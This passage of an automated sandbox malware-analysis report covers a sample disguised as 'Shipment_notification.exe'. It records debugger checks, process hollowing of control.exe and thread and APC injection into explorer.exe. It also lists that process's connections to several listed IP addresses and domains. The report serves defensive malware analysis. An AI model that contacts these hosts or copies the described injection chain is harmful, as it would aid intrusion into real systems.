Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h] 2_2_01B103E2
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h] 2_2_01B103E2
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0DBE9 mov eax, dword ptr fs:[00000030h] 2_2_01B0DBE9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B653CA mov eax, dword ptr fs:[00000030h] 2_2_01B653CA
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B653CA mov eax, dword ptr fs:[00000030h] 2_2_01B653CA
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA131B mov eax, dword ptr fs:[00000030h] 2_2_01BA131B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B13B7A mov eax, dword ptr fs:[00000030h] 2_2_01B13B7A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B13B7A mov eax, dword ptr fs:[00000030h] 2_2_01B13B7A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEDB60 mov ecx, dword ptr fs:[00000030h] 2_2_01AEDB60
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB8B58 mov eax, dword ptr fs:[00000030h] 2_2_01BB8B58
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEDB40 mov eax, dword ptr fs:[00000030h] 2_2_01AEDB40
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEF358 mov eax, dword ptr fs:[00000030h] 2_2_01AEF358
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1FAB0 mov eax, dword ptr fs:[00000030h] 2_2_01B1FAB0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h] 2_2_01AE52A5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h] 2_2_01AE52A5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h] 2_2_01AE52A5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h] 2_2_01AE52A5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h] 2_2_01AE52A5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFAAB0 mov eax, dword ptr fs:[00000030h] 2_2_01AFAAB0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFAAB0 mov eax, dword ptr fs:[00000030h] 2_2_01AFAAB0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1D294 mov eax, dword ptr fs:[00000030h] 2_2_01B1D294
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1D294 mov eax, dword ptr fs:[00000030h] 2_2_01B1D294
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12AE4 mov eax, dword ptr fs:[00000030h] 2_2_01B12AE4
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12ACB mov eax, dword ptr fs:[00000030h] 2_2_01B12ACB
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B24A2C mov eax, dword ptr fs:[00000030h] 2_2_01B24A2C
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B24A2C mov eax, dword ptr fs:[00000030h] 2_2_01B24A2C
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF8A0A mov eax, dword ptr fs:[00000030h] 2_2_01AF8A0A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B03A1C mov eax, dword ptr fs:[00000030h] 2_2_01B03A1C
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEAA16 mov eax, dword ptr fs:[00000030h] 2_2_01AEAA16
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEAA16 mov eax, dword ptr fs:[00000030h] 2_2_01AEAA16
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE5210 mov eax, dword ptr fs:[00000030h] 2_2_01AE5210
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE5210 mov ecx, dword ptr fs:[00000030h] 2_2_01AE5210
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE5210 mov eax, dword ptr fs:[00000030h] 2_2_01AE5210
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE5210 mov eax, dword ptr fs:[00000030h] 2_2_01AE5210
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2927A mov eax, dword ptr fs:[00000030h] 2_2_01B2927A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B9B260 mov eax, dword ptr fs:[00000030h] 2_2_01B9B260
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B9B260 mov eax, dword ptr fs:[00000030h] 2_2_01B9B260
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB8A62 mov eax, dword ptr fs:[00000030h] 2_2_01BB8A62
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B74257 mov eax, dword ptr fs:[00000030h] 2_2_01B74257
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h] 2_2_01AE9240
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h] 2_2_01AE9240
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h] 2_2_01AE9240
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h] 2_2_01AE9240
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B11DB5 mov eax, dword ptr fs:[00000030h] 2_2_01B11DB5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B11DB5 mov eax, dword ptr fs:[00000030h] 2_2_01B11DB5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B11DB5 mov eax, dword ptr fs:[00000030h] 2_2_01B11DB5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B135A1 mov eax, dword ptr fs:[00000030h] 2_2_01B135A1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB05AC mov eax, dword ptr fs:[00000030h] 2_2_01BB05AC
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB05AC mov eax, dword ptr fs:[00000030h] 2_2_01BB05AC
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h] 2_2_01AE2D8A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h] 2_2_01AE2D8A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h] 2_2_01AE2D8A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h] 2_2_01AE2D8A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h] 2_2_01AE2D8A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1FD9B mov eax, dword ptr fs:[00000030h] 2_2_01B1FD9B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1FD9B mov eax, dword ptr fs:[00000030h] 2_2_01B1FD9B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h] 2_2_01B12581
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h] 2_2_01B12581
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h] 2_2_01B12581
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h] 2_2_01B12581
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B98DF1 mov eax, dword ptr fs:[00000030h] 2_2_01B98DF1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFD5E0 mov eax, dword ptr fs:[00000030h] 2_2_01AFD5E0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFD5E0 mov eax, dword ptr fs:[00000030h] 2_2_01AFD5E0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h] 2_2_01B66DC9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h] 2_2_01B66DC9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h] 2_2_01B66DC9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66DC9 mov ecx, dword ptr fs:[00000030h] 2_2_01B66DC9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h] 2_2_01B66DC9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h] 2_2_01B66DC9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B6A537 mov eax, dword ptr fs:[00000030h] 2_2_01B6A537
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h] 2_2_01B14D3B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h] 2_2_01B14D3B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h] 2_2_01B14D3B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB8D34 mov eax, dword ptr fs:[00000030h] 2_2_01BB8D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEAD30 mov eax, dword ptr fs:[00000030h] 2_2_01AEAD30
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0C577 mov eax, dword ptr fs:[00000030h] 2_2_01B0C577
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0C577 mov eax, dword ptr fs:[00000030h] 2_2_01B0C577
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B07D50 mov eax, dword ptr fs:[00000030h] 2_2_01B07D50
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B23D43 mov eax, dword ptr fs:[00000030h] 2_2_01B23D43
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B63540 mov eax, dword ptr fs:[00000030h] 2_2_01B63540
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF849B mov eax, dword ptr fs:[00000030h] 2_2_01AF849B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA14FB mov eax, dword ptr fs:[00000030h] 2_2_01BA14FB
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h] 2_2_01B66CF0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h] 2_2_01B66CF0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h] 2_2_01B66CF0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB8CD6 mov eax, dword ptr fs:[00000030h] 2_2_01BB8CD6
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1BC2C mov eax, dword ptr fs:[00000030h] 2_2_01B1BC2C
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h] 2_2_01BB740D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h] 2_2_01BB740D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h] 2_2_01BB740D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h] 2_2_01B66C0A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h] 2_2_01B66C0A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h] 2_2_01B66C0A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h] 2_2_01B66C0A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0746D mov eax, dword ptr fs:[00000030h] 2_2_01B0746D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h] 2_2_01B7C450
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h] 2_2_01B7C450
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1A44B mov eax, dword ptr fs:[00000030h] 2_2_01B1A44B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h] 2_2_01B67794
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h] 2_2_01B67794
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h] 2_2_01B67794
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF8794 mov eax, dword ptr fs:[00000030h] 2_2_01AF8794
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B237F5 mov eax, dword ptr fs:[00000030h] 2_2_01B237F5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE4F2E mov eax, dword ptr fs:[00000030h] 2_2_01AE4F2E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE4F2E mov eax, dword ptr fs:[00000030h] 2_2_01AE4F2E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1E730 mov eax, dword ptr fs:[00000030h] 2_2_01B1E730
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0F716 mov eax, dword ptr fs:[00000030h] 2_2_01B0F716
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7FF10 mov eax, dword ptr fs:[00000030h] 2_2_01B7FF10
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7FF10 mov eax, dword ptr fs:[00000030h] 2_2_01B7FF10
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB070D mov eax, dword ptr fs:[00000030h] 2_2_01BB070D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB070D mov eax, dword ptr fs:[00000030h] 2_2_01BB070D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1A70E mov eax, dword ptr fs:[00000030h] 2_2_01B1A70E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1A70E mov eax, dword ptr fs:[00000030h] 2_2_01B1A70E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFFF60 mov eax, dword ptr fs:[00000030h] 2_2_01AFFF60
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB8F6A mov eax, dword ptr fs:[00000030h] 2_2_01BB8F6A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFEF40 mov eax, dword ptr fs:[00000030h] 2_2_01AFEF40
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B646A7 mov eax, dword ptr fs:[00000030h] 2_2_01B646A7
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h] 2_2_01BB0EA5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h] 2_2_01BB0EA5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h] 2_2_01BB0EA5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7FE87 mov eax, dword ptr fs:[00000030h] 2_2_01B7FE87
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF76E2 mov eax, dword ptr fs:[00000030h] 2_2_01AF76E2
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B116E0 mov ecx, dword ptr fs:[00000030h] 2_2_01B116E0
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Shipment_notification.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0040CEE3 LdrLoadDll, 2_2_0040CEE3
Source: C:\Users\user\Desktop\Shipment_notification.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 206.54.190.30 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.218.155.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tcatelier.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.243.223 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.114.105.2 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.carcosainvest.com
Source: C:\Windows\explorer.exe Domain query: www.locationsbormes.com
Source: C:\Windows\explorer.exe Domain query: www.peramid.xyz
Source: C:\Windows\explorer.exe Network Connect: 198.177.124.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.piergitarshoes.com
Source: C:\Windows\explorer.exe Domain query: www.emagrecarapido.store
Source: C:\Windows\explorer.exe Domain query: www.isabellagambitta.com
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.96.161.158 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.ywtxsm.com
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.drkathleensanders.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Shipment_notification.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 880000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Shipment_notification.exe Memory written: C:\Users\user\Desktop\Shipment_notification.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread register set: target process: 3324 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3324 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe Jump to behavior
Source: explorer.exe, 00000003.00000000.353184774.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536066000.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.562430568.00000000086B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.577680371.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.339413260.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Users\user\Desktop\Shipment_notification.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
